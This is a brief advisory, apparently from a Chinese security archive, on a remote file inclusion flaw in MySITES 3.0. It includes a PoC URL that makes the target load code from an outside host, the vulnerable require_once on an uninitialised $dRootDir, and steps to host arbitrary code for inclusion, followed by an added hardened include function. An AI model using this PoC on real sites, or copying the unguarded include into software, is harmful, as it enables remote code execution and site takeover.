MySITES3.0 site navigation system remote include vulnerability

ID MYHACK58:62201026303
Type myhack58
Reporter Anonymous
Modified 2010-03-03T00:00:00


Because the variable is not initialized, the include can be made to load an arbitrary file. Two conditions are required:

1. register_globals = On
2. allow_url_fopen = On

With both set, the file can be included. PoC: www.r0expeR.Net/index.php?pathdir=http://www.r0expeR.Net/xx.txt

<?php
$poc = $_GET['pathdir'];
echo require_once($poc);
// poc: http://www.r0expeR.Net/index.php?pathdir=Shell
?>


<?php
// $dRootDir is not initialized before it is used here
require_once( $dRootDir."inc/classes/smarty/Smarty.class.php" );
class template extends smarty .......

On your own website (your-own-site.com/), create inc/classes/smarty/Smarty.class.php; it can contain any code.
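A hardened form of the include shown above, as an added example that is not MySITES code: the base directory is fixed in code so that no request parameter can supply it, and every path is resolved and checked before it is included. The names APP_ROOT and safe_include_path() are hypothetical, the sample inputs are constructed, and PHP 7 or later is assumed.

```php
<?php
// Added example, not part of MySITES. APP_ROOT and safe_include_path()
// are hypothetical names chosen for this illustration.

// The include base is a constant derived from this file's location, so it
// cannot be overwritten from the query string even with register_globals on.
define('APP_ROOT', __DIR__ . DIRECTORY_SEPARATOR);

/**
 * Resolve $relative under APP_ROOT and return its absolute path.
 * Throws if the value is a URL or stream wrapper, does not exist,
 * or resolves to a location outside APP_ROOT.
 */
function safe_include_path(string $relative): string
{
    // Anything with a scheme (http://, ftp://, php://, data: ...) is refused.
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $relative)) {
        throw new InvalidArgumentException('stream wrappers are not allowed');
    }
    $root = rtrim(realpath(APP_ROOT), DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    $full = realpath($root . $relative);   // false when the file does not exist
    if ($full === false || strncmp($full, $root, strlen($root)) !== 0) {
        throw new InvalidArgumentException('path is outside the application root');
    }
    return $full;
}

// Constructed sample inputs: one existing local file and two values to refuse.
$samples = [basename(__FILE__), 'http://example.invalid/xx.txt', '../../outside.php'];
foreach ($samples as $candidate) {
    try {
        echo $candidate, ' -> accepted: ', safe_include_path($candidate), "\n";
    } catch (InvalidArgumentException $e) {
        echo $candidate, ' -> rejected: ', $e->getMessage(), "\n";
    }
}

// The include from the advisory, rewritten with the fixed base:
// require_once safe_include_path('inc/classes/smarty/Smarty.class.php');
```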